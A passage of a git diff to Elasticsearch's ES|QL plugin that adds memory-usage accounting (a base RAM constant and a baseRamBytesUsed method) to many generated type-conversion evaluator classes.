+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDateNanosFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDateNanosFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDateNanosFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDateNanosFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java index eab1eafe4c713..9d347889ae8f3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromDateNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDatetimeFromDateNanosEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDatetimeFromDateNanosEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDatetimeFromDateNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java index e27879468e1e4..1fc6d971f2665 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDatetimeFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDatetimeFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDatetimeFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDatetimeFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java index cdf4d3b1f9fb9..4fbaa17c2f94e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDegreesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDegreesEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDegreesEvaluator.class); + private final EvalOperator.ExpressionEvaluator deg; public ToDegreesEvaluator(Source source, EvalOperator.ExpressionEvaluator deg, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(deg); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += deg.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java index 1b93b7e7b3268..374e6959e342e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDoubleFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromBooleanEvaluator.class); + private final EvalOperator.ExpressionEvaluator bool; public ToDoubleFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(bool); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += bool.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java index 66771ed47eaec..504a9ebd2ea8e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDoubleFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromIntEvaluator.class); + private final EvalOperator.ExpressionEvaluator i; public ToDoubleFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(i); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += i.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java index 651ba0f816ae4..e1b885000dd84 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDoubleFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator l; public ToDoubleFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator l, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(l); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += l.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java index 9c9bb3f5a057a..d10721c0aaa20 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDoubleFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToDoubleFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java index 8e390bf79f68a..7ff0b68ea1262 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToDoubleFromUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToDoubleFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToDoubleFromUnsignedLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator l; public ToDoubleFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator l, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(l); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += l.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java index 1cbc3946f93f8..c02e3b52b10ed 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoPointFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToGeoPointFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToGeoPointFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToGeoPointFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -116,6 +119,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java index ad6171cf36bd4..751bdb3e02d0d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToGeoShapeFromStringEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToGeoShapeFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToGeoShapeFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToGeoShapeFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -116,6 +119,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java index 9cabd771d979b..4437ba384844c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToIntegerFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromBooleanEvaluator.class); + private final EvalOperator.ExpressionEvaluator bool; public ToIntegerFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(bool); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += bool.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java index 1d1f979306871..5dd8fa0d680ec 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToIntegerFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator dbl; public ToIntegerFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl, @@ -114,6 +117,13 @@ public void close() { Releasables.closeExpectNoException(dbl); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += dbl.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java index 8a318985ccd2c..39f3b7b625d89 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToIntegerFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator lng; public ToIntegerFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng, @@ -114,6 +117,13 @@ public void close() { Releasables.closeExpectNoException(lng); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lng.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java index 1c7f11c9340ae..82af737109967 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToIntegerFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToIntegerFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java index 8580f6a4d3fb5..8c68dad7f7641 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToIntegerFromUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToIntegerFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToIntegerFromUnsignedLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator ul; public ToIntegerFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator ul, @@ -114,6 +117,13 @@ public void close() { Releasables.closeExpectNoException(ul); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += ul.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java index 79bec661413ef..a6ab4d571d9c0 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToLongFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromBooleanEvaluator.class); + private final EvalOperator.ExpressionEvaluator bool; public ToLongFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(bool); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += bool.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java index 050eb1bc7c2c9..2e6c1d62f088e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToLongFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator dbl; public ToLongFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl, @@ -114,6 +117,13 @@ public void close() { Releasables.closeExpectNoException(dbl); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += dbl.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java index be940034e8ae4..cb557168758c8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToLongFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromIntEvaluator.class); + private final EvalOperator.ExpressionEvaluator i; public ToLongFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i, 